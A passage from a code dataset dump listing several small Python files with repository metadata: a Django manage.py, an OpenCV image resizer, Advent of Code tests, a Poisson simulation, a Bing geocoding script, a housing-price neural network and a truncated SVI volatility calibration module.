blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5c88190ae443b4fec8426fb3e97aa3b52ac51b19
|
3ac7e1ec8c3551b449e10c43c76e44d285462502
|
/manage.py
|
24c38809017765d996b7094cdc22bfd076324a4c
|
[] |
no_license
|
slayyy/render-manager
|
612ea2c2e611875df7b453a177401ecfeeb9962d
|
efbcf6f2b30061bfa14bb22994e0029e73691896
|
refs/heads/master
| 2022-05-08T23:45:14.461612
| 2019-10-27T17:19:52
| 2019-10-27T17:19:52
| 215,014,775
| 0
| 0
| null | 2022-04-22T22:33:52
| 2019-10-14T10:31:53
|
Python
|
UTF-8
|
Python
| false
| false
| 634
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Entry point for Django's command-line administration utility."""
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "render_manager.settings")
    try:
        # Imported lazily so a missing Django install produces the friendly
        # message below instead of a bare traceback at module import time.
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from exc
    execute_from_command_line(sys.argv)


if __name__ == "__main__":
    main()
|
[
"decobert.a78@gmail.com"
] |
decobert.a78@gmail.com
|
005b11fedd1241560633f3f19ce4ab82b6cf9068
|
43dabf77afd5c44d55b465c1b88bf9a5e7c4c9be
|
/resize.py
|
306400848b45f96d2ec9be96bbc1dbae1a9871f7
|
[] |
no_license
|
geegatomar/OpenCV-Computer-Vision-Adrian-Rosebrock
|
cc81a990a481b5e4347dd97369b38479b46e55bc
|
daa579309010e6e7fefb004b878ffb26374401d0
|
refs/heads/master
| 2022-11-18T13:07:08.040483
| 2020-07-20T01:55:39
| 2020-07-20T01:55:39
| 280,987,262
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 506
|
py
|
import cv2
import argparse
import numpy as np
# Parse CLI arguments: input image path plus the target width in pixels.
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True, help="Path of image")
ap.add_argument("-w", "--width", default=100, help="Width of resized img")
args = vars(ap.parse_args())

image = cv2.imread(args["image"])
width = int(args["width"])

# Scale factor derived from the requested width; image.shape is
# (height, width, channels), so shape[1] is the current width.
ratio = width / image.shape[1]
# cv2.resize expects dsize as (width, height). The original built
# (int(ratio * shape[0]), width) — the pair swapped — which distorts the
# aspect ratio instead of preserving it.
dim = (width, int(ratio * image.shape[0]))
resized = cv2.resize(image, dim, interpolation=cv2.INTER_AREA)
cv2.imshow("Resized img", resized)
cv2.waitKey(0)
|
[
"geegatomar@gmail.com"
] |
geegatomar@gmail.com
|
2bd8ed87c34f5106c1bf3d36425d3ecae107c5ea
|
43f5332bfc67e67ddb1e52e7eae40306ce7ef1e2
|
/12/tests.py
|
a072532fc33103350a0c1c5c0b21149b8b84a7d9
|
[
"MIT"
] |
permissive
|
remihuguet/aoc2020
|
943d9713c5edf2a80aa9e11a46d89ad3ef72b88c
|
c313c5b425dda92d949fd9ca4f18ff66f452794f
|
refs/heads/main
| 2023-04-13T05:07:31.317561
| 2021-03-30T20:36:48
| 2021-03-30T20:36:48
| 317,330,148
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,326
|
py
|
import rainrisk


def test_compute_new_direction():
    """R/L rotations in 90-degree steps applied to a unit direction vector."""
    direction = (1, 0)
    assert (0, -1) == rainrisk.compute_new_direction(direction, 'R90')
    assert (0, 1) == rainrisk.compute_new_direction(direction, 'L90')
    assert (-1, 0) == rainrisk.compute_new_direction(direction, 'R180')
    assert (-1, 0) == rainrisk.compute_new_direction(direction, 'L180')
    assert (0, 1) == rainrisk.compute_new_direction(direction, 'R270')
    assert (0, -1) == rainrisk.compute_new_direction(direction, 'L270')
    assert (1, 0) == rainrisk.compute_new_direction(direction, 'R360')
    assert (1, 0) == rainrisk.compute_new_direction(direction, 'L360')
    # Same set of rotations starting from the perpendicular vector.
    direction = (0, 1)
    assert (1, 0) == rainrisk.compute_new_direction(direction, 'R90')
    assert (-1, 0) == rainrisk.compute_new_direction(direction, 'L90')
    assert (0, -1) == rainrisk.compute_new_direction(direction, 'R180')
    assert (0, -1) == rainrisk.compute_new_direction(direction, 'L180')
    assert (-1, 0) == rainrisk.compute_new_direction(direction, 'R270')
    assert (1, 0) == rainrisk.compute_new_direction(direction, 'L270')
    assert (0, 1) == rainrisk.compute_new_direction(direction, 'R360')
    assert (0, 1) == rainrisk.compute_new_direction(direction, 'L360')


def test_compute_final_position():
    """Final (x, y) ship position after applying the example movement file."""
    with open('12/test_input.txt', 'r') as f:
        mvts = f.readlines()
    assert (17, -8) == rainrisk.compute_final_position(mvts)


def test_compute_manhattan():
    """Manhattan distance of the final position for the example input."""
    assert 25 == rainrisk.compute_manhattan('12/test_input.txt')


def test_compute_position_waypoint():
    """Final position when movements steer a waypoint starting at (10, 1)."""
    with open('12/test_input.txt', 'r') as f:
        mvts = f.readlines()
    initial = (10, 1)
    assert (214, -72) == rainrisk.compute_position_waypoint(mvts, initial)


def test_compute_final_manhattan():
    """Manhattan distance for the waypoint variant of the example input."""
    assert 286 == rainrisk.compute_final_manhattan('12/test_input.txt')


def test_compute_speed_rotation():
    """Rotating the waypoint/speed vector by R/L multiples of 90 degrees."""
    speed = (10, 1)
    assert (1, -10) == rainrisk.compute_speed_rotation(speed, 'R90')
    assert (-1, 10) == rainrisk.compute_speed_rotation(speed, 'L90')
    assert (-10, -1) == rainrisk.compute_speed_rotation(speed, 'R180')
    assert (-10, -1) == rainrisk.compute_speed_rotation(speed, 'L180')
    assert (-1, 10) == rainrisk.compute_speed_rotation(speed, 'R270')
    assert (1, -10) == rainrisk.compute_speed_rotation(speed, 'L270')
|
[
"remi.huguet@gmail.com"
] |
remi.huguet@gmail.com
|
4c61a7aae73fa64897e0df01720f5f1eed93b6dd
|
16de2efcba33961633c1e63e493986bad54c99bd
|
/test.py
|
73b7e8d90f6b8b0378a1486d70f70ac2af704483
|
[] |
no_license
|
thakur-nishant/Algorithms
|
a0cc45de5393d4cbb428cccdbf81b6937cdf97d7
|
1a0306ca9a9fc68f59e28ea26c24822c15350294
|
refs/heads/master
| 2022-01-07T22:22:09.764193
| 2019-05-17T20:10:24
| 2019-05-17T20:10:24
| 109,093,687
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 424
|
py
|
from math import log
from random import random
import matplotlib.pyplot as plt
import numpy as np
# Simulate a homogeneous Poisson process with rate l (events/hour) on [0, T]
# and plot the counting process N(t).
l = 2
T = 24

# Exponential(1/l) inter-arrival times via inverse-transform sampling:
# -1/l * log(U), U ~ Uniform(0, 1).
curr = -1/l * log(random())
arrival = [curr]
while curr < T:
    curr = curr - 1/l * log(random())
    arrival.append(curr)
# The loop exits only after appending one arrival past T; discard it.
# (The original `arrival[1:]` dropped the FIRST valid arrival instead,
# keeping the out-of-range sample and undercounting N(t) by one everywhere.)
arrival = arrival[:-1]

t = np.arange(0.0, T, 0.01)
N = len(t)
X = np.zeros(N)
# Convert once outside the loop instead of relying on list<->scalar
# comparison broadcasting on every iteration.
arrival_arr = np.asarray(arrival)
for i in range(N):
    # N(t_i) = number of arrivals at or before t_i.
    X[i] = np.sum(arrival_arr <= t[i])

plt.plot(t, X)
plt.xlabel('time(hrs)')
plt.show()
|
[
"nt.nishantt@gmail.com"
] |
nt.nishantt@gmail.com
|
6dcdc505bde9ee4996f62e4c6d83879c0f9d77ab
|
1d4cdffde9e2cf750b0fbe0cc06f4f4455393762
|
/Chapter09/Python/02-geocoding-parallel-with-python.py
|
ad3faa246f40c105739ee455cf75e592df013813
|
[
"MIT"
] |
permissive
|
ndarvishev/Extending-Power-BI-with-Python-and-R
|
59b3a82bb7bf863756c71d8bff11c41ad9164fe3
|
d52b7064128ff086c315335d780df3dde1fb13d5
|
refs/heads/main
| 2023-07-20T07:27:22.377184
| 2021-09-05T14:29:09
| 2021-09-05T14:29:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,343
|
py
|
# %%
import os
import requests
import urllib
import json
import pandas as pd
import dask.dataframe as dd
import time
# %%
def bing_geocode_via_address(address):
    """Geocode one address through the Bing Maps REST Locations API.

    Returns a tuple (num_resources, formattedAddress, lat, lng, text,
    status, url) taken from the HTTP response; the first four fall back to
    0/None when the response cannot be parsed.
    """
    # trim the string from leading and trailing spaces using strip
    # NOTE(review): the key is appended after a '?' even though 'query=' is
    # already embedded in the path; confirm against the Bing Maps Locations
    # API docs whether this should read '...?query=...&key=...'.
    full_url = f"{base_url}query={urllib.parse.quote(address.strip(), safe='')}?key={AUTH_KEY}"
    r = requests.get(full_url)
    try:
        data = r.json()
        # number of resources found, used as index to get the
        # latest resource
        num_resources = data['resourceSets'][0]['estimatedTotal']
        resource = data['resourceSets'][0]['resources'][num_resources-1]
        formattedAddress = resource['address']['formattedAddress']
        lat = resource['point']['coordinates'][0]
        lng = resource['point']['coordinates'][1]
    except (ValueError, KeyError, IndexError, TypeError):
        # ValueError covers JSON-decode failures (requests' JSONDecodeError
        # subclasses it); the others cover missing/malformed fields. The
        # original bare `except:` also swallowed KeyboardInterrupt and
        # genuine programming errors.
        num_resources = 0
        formattedAddress = None
        lat = None
        lng = None
    text = r.text
    status = r.reason
    url = r.url
    return num_resources, formattedAddress, lat, lng, text, status, url
def enrich_with_geocoding(passed_row, col_name):
    """Geocode the address held in passed_row[col_name] and attach the
    results to the row as seven new fields."""
    # Fixed waiting time to avoid the "Too many requests" error
    # as basic accounts are limited to 5 queries per second
    time.sleep(3)
    address_value = str(passed_row[col_name])
    geocode_result = bing_geocode_via_address(address_value)
    #passed_row.reset_index(drop=True, inplace=True)
    # Field names aligned positionally with bing_geocode_via_address's
    # return tuple.
    result_fields = ('numResources', 'formattedAddress', 'latitude',
                     'longitude', 'text', 'status', 'url')
    for field_name, field_value in zip(result_fields, geocode_result):
        passed_row[field_name] = field_value
    return passed_row
# %%
####################################################################################################
# To be set up separately for security reasons
####################################################################################################
# NOTE(review): placeholder only — the real key must come from the
# environment, never from source control.
os.environ['BINGMAPS_API_KEY'] = '<your-api-key>'
####################################################################################################
base_url= "http://dev.virtualearth.net/REST/v1/Locations/"
AUTH_KEY = os.environ.get('BINGMAPS_API_KEY')
# %%
# Load the test addresses lazily with Dask, keeping only the columns used
# downstream. NOTE(review): machine-specific absolute path.
ddf_orig = dd.read_csv(r'D:\LZavarella\OneDrive\MVP\PacktBook\Code\Extending-Power-BI-with-Python-and-R\Chapter09\geocoding_test_data.csv',
                       encoding='latin-1')
ddf = ddf_orig[['full_address','lat_true','lon_true']]
ddf.npartitions
# %%
# Repartition so every CPU core gets work (two partitions per core).
ddf = ddf.repartition(npartitions=os.cpu_count()*2)
ddf.npartitions
# %%
# Row-wise geocoding; `meta` declares the output schema Dask should expect
# from enrich_with_geocoding so the lazy graph can be built without running it.
enriched_ddf = ddf.apply(enrich_with_geocoding, axis=1, col_name='full_address',
                         meta={'full_address': 'string', 'lat_true': 'float64', 'lon_true': 'float64',
                               'numResources': 'int32', 'formattedAddress': 'string',
                               'latitude': 'float64', 'longitude': 'float64', 'text': 'string',
                               'status': 'string', 'url': 'string'})
# Time the materialization of the lazy Dask graph (this is where the HTTP
# requests actually happen).
tic = time.perf_counter()
enriched_df = enriched_ddf.compute()
toc = time.perf_counter()
print(f'{enriched_df.shape[0]} addresses geocoded in {toc - tic:0.4f} seconds')
# %%
enriched_df
# %%
|
[
"lucazavarella@outlook.com"
] |
lucazavarella@outlook.com
|
4481446207abde7e6ba8f0c16de738b7d78e0e02
|
2a7b79c98aa6f8b36a68c96937cd8f4577ff48be
|
/neural_network/californiaHousingNeuralNet1.py
|
2a8956b56cc13ec401ebb1d7395c90045c79c2f1
|
[] |
no_license
|
Utlak88/California-Housing-Dataset
|
6935a207e465d48e3fcef2930d8e65bc7d9c4c99
|
6aae815d323e39d041586fdc54da6c7f83809995
|
refs/heads/main
| 2023-02-01T16:37:53.305730
| 2020-12-23T07:40:25
| 2020-12-23T07:40:25
| 323,824,418
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,676
|
py
|
# Neural network based on the Google Machine Learning Crash Course
################################################################################
# Importing modules
import numpy as np
import pandas as pd
import tensorflow as tf
from sklearn import metrics
from sklearn.model_selection import train_test_split
from matplotlib import pyplot as plt
print("Imported modules.")
################################################################################
################################################################################
# Defining functions for model as well as data visualizations
def plot_the_loss_curve(epochs, mse):
    """Render the training-loss trajectory (mean squared error per epoch)."""
    plt.figure()
    plt.plot(epochs, mse, label="Loss")
    plt.xlabel("Epoch")
    plt.ylabel("Mean Squared Error")
    plt.legend()
    # Pad the y-axis slightly below the minimum and above the maximum loss.
    y_bounds = [mse.min() * 0.95, mse.max() * 1.03]
    plt.ylim(y_bounds)
    plt.show()
print("Defined function to generate curve of loss vs epoch.")
def plot_r_squared_comparison(y_test, y_predict, title):
    """Produce R-squared plot to evaluate quality of model prediction of test data."""
    # sklearn's r2_score signature is (y_true, y_pred); the original call
    # passed (y_predict, y_test), which computes R-squared with the roles
    # swapped and reports a wrong value whenever the fit is imperfect.
    r_squared = metrics.r2_score(y_test, y_predict)
    plt.scatter(y_test, y_predict)
    plt.xlabel("Normalized Actual Values")
    plt.ylabel("Normalized Predicted Values")
    plt.title(title)
    # Overlay the least-squares line through the (actual, predicted) points.
    plt.plot(
        np.unique(y_test),
        np.poly1d(np.polyfit(y_test, y_predict, 1))(np.unique(y_test)),
    )
    # Place the R-squared label relative to the spread of the data.
    x_r2_label_placement = pd.Series(y_test).median() - 1.2 * pd.Series(y_test).std()
    y_r2_label_placement = (
        pd.Series(y_predict).median() + 3 * pd.Series(y_predict).std()
    )
    plt.text(
        x_r2_label_placement,
        y_r2_label_placement,
        "R-squared = {0:.2f}".format(r_squared),
    )
    plt.show()
print("Defined function to generate R-squared plot.")
def create_model(my_learning_rate, my_feature_layer):
    """Create and compile a two-hidden-layer regression network.

    my_learning_rate : Adam learning rate.
    my_feature_layer : Keras feature layer mapping raw inputs to the model's
                       feature vector; added as the first layer.
    Returns the compiled model.
    """
    model = tf.keras.models.Sequential()
    model.add(my_feature_layer)
    # Two ReLU hidden layers with L2 weight regularization.
    model.add(
        tf.keras.layers.Dense(
            units=20,
            activation="relu",
            kernel_regularizer=tf.keras.regularizers.l2(0.04),
            name="Hidden1",
        )
    )
    model.add(
        tf.keras.layers.Dense(
            units=12,
            activation="relu",
            kernel_regularizer=tf.keras.regularizers.l2(0.04),
            name="Hidden2",
        )
    )
    # Single linear output unit for the regression target.
    model.add(tf.keras.layers.Dense(units=1, name="Output"))
    model.compile(
        # `lr` is a long-deprecated alias that recent Keras releases removed;
        # use the canonical `learning_rate` keyword.
        optimizer=tf.keras.optimizers.Adam(learning_rate=my_learning_rate),
        loss="mean_squared_error",
        metrics=[tf.keras.metrics.MeanSquaredError()],
    )
    return model
def train_model(model, dataset, epochs, label_name, batch_size=None):
    """Feed the training set to the model and return its per-epoch MSE."""
    # Keras wants a {column-name: ndarray} mapping; pull the label out of it.
    features = {}
    for name, value in dataset.items():
        features[name] = np.array(value)
    label = np.array(features.pop(label_name))
    history = model.fit(
        x=features, y=label, batch_size=batch_size, epochs=epochs, shuffle=True
    )
    # Track the progression of training: snapshot of the model's mean
    # squared error at each epoch.
    hist = pd.DataFrame(history.history)
    return history.epoch, hist["mean_squared_error"]
print("Defined the create_model and train_model functions.")
################################################################################
################################################################################
# Adjusting the granularity of reporting.
pd.options.display.max_rows = 10
pd.options.display.float_format = "{0:1.3f}".format
################################################################################
################################################################################
# Importing data
# NOTE(review): both reads download over the network at module run time.
train_data = pd.read_csv(
    "https://download.mlcc.google.com/mledu-datasets/california_housing_train.csv"
)
# shuffle the examples
train_data = train_data.reindex(np.random.permutation(train_data.index))
test_data = pd.read_csv(
    "https://download.mlcc.google.com/mledu-datasets/california_housing_test.csv"
)
print("Imported data.")
################################################################################
################################################################################
# TRAIN FEATURE ENGINEERING (PART 1)
# Defining variable for use to assign column values to column variables
# data = train_data
# # Initially defining column variables
# (
# longitude,
# latitude,
# housing_median_age,
# total_rooms,
# total_bedrooms,
# population,
# households,
# median_income,
# median_house_value,
# ) = range(0, len(data.columns))
# # Assigning column values to column variables
# dict_for_columns = {}
# for x in range(0, len(data.columns)):
# dict_for_columns[data.columns[x]] = data[data.columns[x]]
# # Defining column variables for use in data analysis
# globals().update(dict_for_columns)
# # Visualizing data
# # train_data.hist(figsize=[20,13])
# # train_data.boxplot(figsize=[20,13])
# # train_data.drop('median_house_value',axis=1).boxplot(figsize=[20,13])
# # Clipping outliers
# total_rooms[total_rooms > 6000] = 6000
# train_data[train_data.columns[3]] = total_rooms
# total_bedrooms[total_bedrooms > 1300] = 1300
# train_data[train_data.columns[4]] = total_bedrooms
# population[population > 3000] = 3000
# train_data[train_data.columns[5]] = population
# households[households > 1250] = 1250
# train_data[train_data.columns[6]] = households
# median_income[median_income > 8.5] = 8.5
# train_data[train_data.columns[7]] = median_income
# print("Clipped train features.")
# Z-Score Normalizing
# columns_for_normalizing = train_data[train_data.columns[0:9]]
# normalized_columns = (
# columns_for_normalizing - columns_for_normalizing.mean()
# ) / columns_for_normalizing.std()
# train_data[normalized_columns.columns] = normalized_columns
# print("Normalized train features.")
# # Revisualizing data
# # train_data.hist(figsize=[20,13])
# # train_data.drop('median_house_value',axis=1).boxplot(figsize=[20,13])
# # Adding new feature calculating the ratio of total bedrooms to total rooms
# train_data["rooms_ratio"] = train_data["total_bedrooms"] / train_data["total_rooms"]
# print("Added new train data feature calculating the ratio of total bedrooms to total rooms.")
################################################################################
################################################################################
# TEST FEATURE ENGINEERING (PART 1)
# Defining variable for use to assign column values to column variables
# data = test_data
# # Initially defining column variables
# (
# longitude,
# latitude,
# housing_median_age,
# total_rooms,
# total_bedrooms,
# population,
# households,
# median_income,
# median_house_value,
# ) = range(0, len(data.columns))
# # Assigning column values to column variables
# dict_for_columns = {}
# for x in range(0, len(data.columns)):
# dict_for_columns[data.columns[x]] = data[data.columns[x]]
# # Defining column variables for use in data analysis
# globals().update(dict_for_columns)
# # Visualizing data
# # test_data.hist(figsize=[20,13])
# # test_data.boxplot(figsize=[20,13])
# # test_data.drop('median_house_value',axis=1).boxplot(figsize=[20,13])
# # Clipping outliers
# total_rooms[total_rooms > 6000] = 6000
# test_data[test_data.columns[3]] = total_rooms
# total_bedrooms[total_bedrooms > 1300] = 1300
# test_data[test_data.columns[4]] = total_bedrooms
# population[population > 3000] = 3000
# test_data[test_data.columns[5]] = population
# households[households > 1250] = 1250
# test_data[test_data.columns[6]] = households
# median_income[median_income > 8.5] = 8.5
# test_data[test_data.columns[7]] = median_income
# print("Clipped test features.")
# Z-Score Normalizing
# columns_for_normalizing = test_data[test_data.columns[0:9]]
# normalized_columns = (
# columns_for_normalizing - columns_for_normalizing.mean()
# ) / columns_for_normalizing.std()
# test_data[normalized_columns.columns] = normalized_columns
# print("Normalized test features.")
# # Revisualizing data
# # test_data.hist(figsize=[20,13])
# # test_data.drop('median_house_value',axis=1).boxplot(figsize=[20,13])
# # Adding new feature calculating the ratio of total bedrooms to total rooms
# test_data["rooms_ratio"] = test_data["total_bedrooms"] / test_data["total_rooms"]
# print("Added new test data feature calculating the ratio of total bedrooms to total rooms.")
################################################################################
################################################################################
# FEATURE ENGINEERING (PART 2)
# Create an empty list that will eventually hold all created feature columns.
# feature_columns = []
# # Establishing resolution by Zs
# resolution_in_Zs = 0.3 # 3/10 of a standard deviation.
# # Create a bucket feature column for latitude.
# latitude_as_a_numeric_column = tf.feature_column.numeric_column("latitude")
# latitude_boundaries = list(
# np.arange(
# int(min(train_data["latitude"])),
# int(max(train_data["latitude"])),
# resolution_in_Zs,
# )
# )
# latitude = tf.feature_column.bucketized_column(
# latitude_as_a_numeric_column, latitude_boundaries
# )
# # Create a bucket feature column for longitude.
# longitude_as_a_numeric_column = tf.feature_column.numeric_column("longitude")
# longitude_boundaries = list(
# np.arange(
# int(min(train_data["longitude"])),
# int(max(train_data["longitude"])),
# resolution_in_Zs,
# )
# )
# longitude = tf.feature_column.bucketized_column(
# longitude_as_a_numeric_column, longitude_boundaries
# )
# # Create a feature cross of latitude and longitude.
# latitude_x_longitude = tf.feature_column.crossed_column(
# [latitude, longitude], hash_bucket_size=100
# )
# crossed_feature = tf.feature_column.indicator_column(latitude_x_longitude)
# feature_columns.append(crossed_feature)
# # Represent median_income as a floating-point value.
# median_income = tf.feature_column.numeric_column("median_income")
# feature_columns.append(median_income)
# # Represent population as a floating-point value.
# population = tf.feature_column.numeric_column("population")
# feature_columns.append(population)
# # Convert the list of feature columns into a layer that will later be fed into the model.
# my_feature_layer = tf.keras.layers.DenseFeatures(feature_columns)
################################################################################
################################################################################
# TRAINING AND EVALUATING MODEL
# The following variables are the hyperparameters.
learning_rate = 0.005
epochs = 200
batch_size = 1000
label_name = "median_house_value"
# Establish model topography.
# NOTE(review): `my_feature_layer` is only defined inside the commented-out
# "FEATURE ENGINEERING (PART 2)" section above, so as the file stands this
# line raises NameError — restore that section (or define a feature layer
# here) before running.
my_model = create_model(learning_rate, my_feature_layer)
# Train the model on the normalized training set.
# NOTE: `epochs` is rebound here from the int hyperparameter to the list of
# epoch indices returned by train_model.
epochs, mse = train_model(my_model, train_data, epochs, label_name, batch_size)
plot_the_loss_curve(epochs, mse)
test_features = {name: np.array(value) for name, value in test_data.items()}
test_label = np.array(test_features.pop(label_name))  # isolate the label
print("\n Evaluate the new model against the test set:")
my_model.evaluate(x=test_features, y=test_label, batch_size=batch_size)
################################################################################
################################################################################
# Predicting data using trained model
predicted_values = np.squeeze(my_model.predict(test_features))
print("Predicted data using model.")
################################################################################
################################################################################
# Plotting comparison of predicted to test data in form of R-squared plot
print("Generating R-squared plot to evaluate quality of model prediction of test data.")
plot_r_squared_comparison(
    test_label,
    predicted_values,
    "California Median House Value Prediction Quality\nNo Feature Engineering",
)
################################################################################
|
[
"noreply@github.com"
] |
noreply@github.com
|
0fcc5a13fd81c3f9c2206bd9e4d9545b3032f2f3
|
7954a82026c982aba15c5195317fb49231cc6937
|
/code/SSVIUnconstrained.py
|
5f23dfa3b6d45d64e1b951977f0ee1677293ac2b
|
[
"BSD-3-Clause"
] |
permissive
|
mChataign/Beyond-Surrogate-Modeling-Learning-the-Local-Volatility-Via-Shape-Constraints
|
81c7f2639e9ac3d57d2c29ba10be0596a6514ce9
|
63304824c5775927b7495383ec2c9cd0277e5845
|
refs/heads/Marc/GP
| 2023-05-25T04:48:45.665335
| 2021-06-15T10:06:59
| 2021-06-15T10:06:59
| 314,231,951
| 17
| 10
|
BSD-3-Clause
| 2021-04-14T17:20:15
| 2020-11-19T11:48:47
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 39,035
|
py
|
import numpy as np
import pandas as pd
import scipy
import matplotlib.pyplot as plt
import scipy.optimize as opt
from sklearn.metrics import mean_squared_error
from datetime import datetime
from scipy.optimize import minimize
from scipy import integrate
import BS
import bootstrapping
import sys, os
import time
impliedVolColumn = BS.impliedVolColumn
"""
Implementation is adapted from a proposal of Tahar Ferhati partially based on his work :
"Ferhati, T. (2020). Robust Calibration For SVI Model Arbitrage Free. Available at SSRN 3543766.".
"""
##################################################################################### Final calibration
# ============ SVI Functions ==================================================
# Attention à l'ordre des paramètres
def SVI(k, a, b, rho, m, sig):
    """Raw-SVI total implied variance at log-moneyness k.

    w(k) = a + b * (rho * (k - m) + sqrt((k - m)^2 + sig^2))
    """
    shifted = k - m
    return a + b * (rho * shifted + np.sqrt(shifted * shifted + sig * sig))


def SVI_two_arguments(theta, k):
    """Raw SVI with the five parameters packed into one vector theta."""
    return SVI(k, *theta)


def fct_least_squares(theta, log_mon, tot_implied_variance):
    """L2 calibration error between the SVI smile and market total variance."""
    residual = SVI_two_arguments(theta, log_mon) - tot_implied_variance
    return np.linalg.norm(residual, 2)
#================= g(k) function for the convexity test ========================
def test_convexity(k, a, b, rho, m, sig):
    """Gatheral's g(k) function; g(k) >= 0 rules out butterfly arbitrage."""
    root = np.sqrt((k - m) * (k - m) + sig * sig)
    w = SVI(k, a, b, rho, m, sig)
    # First and second derivatives of the total variance w(k).
    w_prime = b * rho + b * (k - m) / root
    w_second = b * sig * sig / (root ** 3)
    g = w_second / 2 - w_prime ** 2 * (1 / w + 1.0 / 4) / 4
    return g + (1 - k * w_prime / (2 * w)) ** 2
# ==== Wing constraints: non-negative values mean the slice is admissible ====
# Right wing ================================================================
def constraint1(theta, log_mon):
    """Right-wing condition on (a, b, rho, m)."""
    a, b, rho, m, sig = theta
    edge = b * m * (rho + 1)
    return (4 - a + edge) * (a - edge) - b * b * (rho + 1) * (rho + 1)

def constraint2(theta, log_mon):
    """Right-wing slope bound: 4 - b^2 (rho+1)^2 >= 0."""
    a, b, rho, m, sig = theta
    return 4 - b * b * (rho + 1) * (rho + 1)

# Left wing =================================================================
def constraint3(theta, log_mon):
    """Left-wing condition on (a, b, rho, m)."""
    a, b, rho, m, sig = theta
    edge = b * m * (rho - 1)
    return (4 - a + edge) * (a - edge) - b * b * (rho - 1) * (rho - 1)

def constraint4(theta, log_mon):
    """Left-wing slope bound: 4 - b^2 (rho-1)^2 >= 0."""
    a, b, rho, m, sig = theta
    return 4 - b * b * (rho - 1) * (rho - 1)
#==========================================================================
## We check a posteriori the positivity and Slope conditions
# min SVI = a + b*sigma*np.sqrt(1 - rho*rho) positif !
#(1) Right Slope b(rho+1) < 2
#(2) Right Slope b(rho-1) > -2
#==========================================================================
def test_positivity(a, b, rho, sigma):
    """Check that the minimum of the SVI total variance is strictly positive."""
    assert rho < 1
    assert rho > -1
    assert b > 0
    # Verify the positivity condition on the closed-form smile minimum.
    minimum = a + b * sigma * np.sqrt(1 - rho * rho)
    assert minimum > 0
    print("\n Positivity test OK and SVI min is :", minimum)
    return 0

def test_slope(b, rho):
    """Check the wing-slope bounds b(rho+1) < 2 and b(rho-1) > -2."""
    right_slope = b * (rho + 1)
    left_slope = b * (rho - 1)
    print("\n Right slope is b*(rho+1) < 2 and it's value is: %1.7f" % right_slope)
    print("\n Left slope is b*(rho-1) > -2 and it's value is: %1.7f" % left_slope)
    assert right_slope < 2
    assert left_slope > -2
##################################################
## Test Positivity of the density function
##################################################
def dminus(x, a, b, rho, m, sigma):
    """Black-Scholes d- computed from the SVI total variance at x."""
    total_vol = np.sqrt(SVI(x, a, b, rho, m, sigma))
    return -x / total_vol - 0.5 * total_vol

def densitySVI(x, a, b, rho, m, sigma):
    """Risk-neutral density implied by the SVI smile (g(k) times the
    lognormal kernel)."""
    d2 = dminus(x, a, b, rho, m, sigma)
    w = SVI(x, a, b, rho, m, sigma)
    kernel = np.exp(-0.5 * d2 * d2) / np.sqrt(2.0 * np.pi * w)
    return test_convexity(x, a, b, rho, m, sigma) * kernel
def generateRandomStartValues(lb=None, ub=None):
    """Draw a uniform random parameter vector inside the box [lb, ub].

    Infinite bounds are clipped to +/-1000 before sampling. The inputs are
    copied first: the original overwrote non-finite entries directly in the
    caller's arrays, a surprising side effect. Using `.size` also removes
    the dependency on the module-level `size()` helper.
    """
    lb = np.array(lb, dtype=float, copy=True)
    ub = np.array(ub, dtype=float, copy=True)
    # Replace +/-inf with a large finite box so the uniform draw can scale it.
    lb[~np.isfinite(lb)] = -1000.0
    ub[~np.isfinite(ub)] = 1000.0
    return lb + np.random.rand(lb.size) * (ub - lb)
def isAdmissible(x, constraintList):
    """Return True unless some inequality constraint evaluates negative at x."""
    return not any(constraint["fun"](x) < 0.0 for constraint in constraintList)
def generateAdmissibleRandomStartValues(lb=None, ub=None, constraintList=None):
    """Rejection-sample a random start vector until every constraint holds.

    lb, ub : bound arrays forwarded to generateRandomStartValues.
    constraintList : scipy-style dicts with a 'fun' key; None (or an empty
        list) means unconstrained. The original used the mutable default
        `[]`, replaced here with the conventional None sentinel.

    Raises Exception after 10000 failed attempts.
    """
    if constraintList is None:
        constraintList = []
    nbIter = 0
    x = generateRandomStartValues(lb=lb, ub=ub)
    while not isAdmissible(x, constraintList):
        x = generateRandomStartValues(lb=lb, ub=ub)
        if nbIter >= 10000:
            raise Exception("Too many attempts")
        nbIter += 1
    return x
def fit_svi(mkt_tot_variance=None,
            maturity=None,
            log_moneyness=None,
            initialGuess=None,
            S0=None,
            lambdaList = None,
            param_slice_before = None):
    """Calibrate one raw-SVI slice (a, b, rho, m, sigma) with SLSQP.

    mkt_tot_variance : market total implied variances for the slice.
    maturity, S0 : not used by the body; kept for the callers' interface.
    log_moneyness : log-moneyness grid aligned with mkt_tot_variance.
    initialGuess : optional warm-start parameter vector.
    lambdaList : weights for the inequality constraints; indices 0-3 scale
        the wing constraints, index 4 (needed only when param_slice_before
